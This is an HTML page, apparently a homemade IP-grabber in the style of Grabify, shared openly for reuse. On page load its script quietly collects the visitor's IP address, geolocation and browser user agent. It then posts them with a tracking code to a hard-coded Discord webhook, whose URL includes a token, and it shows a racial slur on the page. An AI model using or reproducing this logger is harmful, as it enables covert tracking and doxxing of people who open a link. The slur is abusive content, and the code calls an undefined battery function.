<!-- skid this code i couldnt care its not ob'd for a reason <3 -->
<!DOCTYPE html>
<html>
<head>
    <title>grabify for skids!</title>
    <style>
        @font-face {
            font-family: VCR;
            src: url(https://linux.scot/fonts/VCR.ttf);
        }
        #invisibleFrame { display: none; }

        body {
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            background-color: #f0f0f0;
        }

        h1 {
            font-size: 3rem;
            color: #333;
            text-transform: uppercase;
            position: relative;
            transition: transform 0.3s;
        }

        h1:hover {
            transform: scale(1.1);
            text-shadow: 2px 2px 5px rgba(0, 0, 0, 0.3);
        }
    </style>

</head>
<body>

    <h1 style="text-align: center; font-family: 'VCR', sans-serif;">get webhooked nigga!!!!</h1>

    <script>

        fetch('https://api.ipify.org?format=json')
            .then(response => response.json())
            .then(data => {
                const ipAddress = data.ip;
                fetchGeolocationData(ipAddress);
            })
            .catch(error => {
                console.error('Error fetching IP address:', error);
            });

        function fetchGeolocationData(ipAddress) {
            fetch(`https://freeipapi.com/api/json/${ipAddress}`)
                .then(response => response.json())
                .then(data => {
                    const geoLocationData = JSON.stringify(data, null, 2); 

                    const embed = {
                        title: 'Success!',
                        description: `Tracking Code: ${getParameterByName('code')}`,
                        fields: [
                            { name: 'IP Address', value: ipAddress },
                            { name: 'Geolocation', value: `\`\`\`json\n${geoLocationData}\n\`\`\`` },
                            { name: 'Battery Level', value: getBatteryLevel() },
                            { name: 'Device', value: navigator.userAgent },
                            { name: 'More Info', value: `https://whatismyipaddress.com/ip/${ipAddress}` }                        
                     ],
                        footer: {
                            text: 'powered by /fartbin api'
                        }
                    };

                    const webhookUrl = 'https://discord.com/api/webhooks/1258277399607513159/fnIHNM-y3VV9BQLvw2K65wtfNIB79t3wNs7VIrAm5D_4cZcxiPfFHnYhuuA7SVh1roSb';
                    fetch(webhookUrl, {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json'
                        },
                        body: JSON.stringify({ embeds: [embed] })
                    })
                        .then(response => {
                            if (response.ok) {
                                console.log('Embed sent successfully');
                            } else {
                                console.error('Failed to send embed');
                            }
                        })
                        .catch(error => {
                            console.error('Error:', error);
                        });
                })
                .catch(error => {
                    console.error('Error fetching geolocation data:', error);
                });
        }

        function getParameterByName(name, url) {
            if (!url) url = window.location.href;
            name = name.replace(/[\[\]]/g, '\\$&');
            const regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)'),
                results = regex.exec(url);
            if (!results) return null;
            if (!results[2]) return '';
            return decodeURIComponent(results[2].replace(/\+/g, ' '));
        }


    </script>
</body>
</html>
